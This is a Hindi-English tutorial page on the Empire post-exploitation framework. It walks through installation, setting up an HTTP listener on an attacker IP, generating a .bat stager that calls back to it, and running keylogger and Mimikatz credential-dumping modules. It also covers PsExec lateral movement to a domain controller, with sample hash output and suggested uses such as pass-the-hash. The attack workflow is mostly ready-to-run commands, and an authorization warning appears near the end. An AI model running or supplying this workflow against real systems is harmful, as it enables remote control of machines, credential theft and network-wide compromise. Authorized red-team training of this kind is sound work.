Empire

Post-Exploitation Framework

📻 Empire क्या है?

Empire एक powerful post-exploitation and adversary simulation framework है। यह PowerShell, Python, और other agents use करके compromised systems को maintain और control करता है।

👉 Red team operations और post-exploitation में यह सबसे popular framework है।

🔍 Empire क्या-क्या कर सकता है

C2 Communication

Command & Control establish करना

Agent Deployment

PowerShell/Python agents deploy

Module Execution

400+ post-exploitation modules

Lateral Movement

Network में spread करना

Persistence

Maintain access over time

Evasion Techniques

Avoid detection & AV bypass

⚙️ Kali / Linux में Empire install

GitHubInstallation Commands

Clone Empire Repository

git clone https://github.com/BC-SECURITY/Empire.git

Go to Empire Directory

cd Empire

Install Dependencies

./setup/install.sh

Start Empire

./empire

👉 Note: Empire 3.0+ (BC-Security fork) recommended है, original project deprecated है

💻 Basic Commands (Use)

👉 Empire console में commands:

List Listeners

listeners

Create HTTP Listener

uselistener http
set Host http://192.168.1.100
set Port 8080
execute

Generate PowerShell Stager

usestager windows/launcher_bat
set Listener http
execute

List Agents

agents

Interact with Agent

interact AGENT_NAME

List Available Modules

searchmodule

Execute Module

usemodule credentials/mimikatz/logonpasswords
execute

🌐 Real Example (Practical समझ)

Example🎯 Complete Empire Workflow

Step 1: Start Empire Console

./empire

Step 2: Create Listener (C2 Server)

listeners
uselistener http
set Host http://10.10.10.1
set Port 8080
execute

Step 3: Generate Payload

usestager windows/launcher_bat
set Listener http
execute

👉 Generated payload (.bat file) target system पर run करो → agent Empire को connect होगा

🤖 Agent Management & Commands

जब agent connect हो जाए:

[*] Agent H7W8P9Q1 connected from 10.10.10.50
[+] Agent Name: H7W8P9Q1
[+] Computer: DESKTOP-WIN10
[+] Username: john
[+] Process ID: 4520
[+] High Integrity: True

Interact with Agent

interact H7W8P9Q1

Run Command on Target

shell whoami
shell ipconfig

Screenshot Capture

screenshot

Keylogger Start

usemodule collection/keylogger
execute
📊 Module Execution Example

Credential extraction using Mimikatz module:

Empire: usemodule credentials/mimikatz/logonpasswords
[+] Executing module on H7W8P9Q1...
[+] Tasked agent to run Mimikatz
Job started: 12
[+] Job completed
Username: Administrator
Domain: DESKTOP-WIN10
NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
SHA1: a3f1c8e9b2d5f4a6c7e8d0f1a2b3c4d5

👉 Empire से मिली credentials का use:

  • • दूसरे systems पर lateral movement (pass-the-hash)
  • • Admin privileges को escalate
  • • Sensitive data access करना
  • • Persistence maintain करना

🔥 Advanced Example - Lateral Movement

Invoke-PsExec for Remote Code Execution

usemodule situational_awareness/network/powerview/get_local_domain_admin
execute

usemodule lateral_movement/invoke_psexec
set ComputerName DC01
set Listener http
execute

👉 Attack flow:

Recon

Find domain admins

PsExec

Remote execution

Deploy

New agent

👉 एक system से दूसरे system में Empire agent deploy हो जाता है → entire network compromise

⚠️ Important Warning

Empire का use केवल authorized testing environments में करो

🚨 Critical Points:

  • High Risk: यह C2 framework network पर permanent foothold बना सकता है
  • Network Spread: Lateral movement से entire network compromise हो सकता है
  • Legal Required: Written permission बिना use करना illegal है
  • Isolated Lab: Testing के लिए isolated VM network use करो

📌 Red Team Use: Empire legitimate red team और security testing के लिए design है, malicious use cyber crime है

🧩 Related Tools

Mimikatz

Credentials extraction

Metasploit

Exploitation framework

Cobalt Strike

Commercial C2 framework

PowerSploit

PowerShell toolkit

💡 Simple समझ

Empire = "Pentester का Remote Control"

यह आपको compromised systems पर remote control देता है। एक बार agent deploy हो जाए, आप target पर commands run, data steal, और पूरे network में spread कर सकते हो।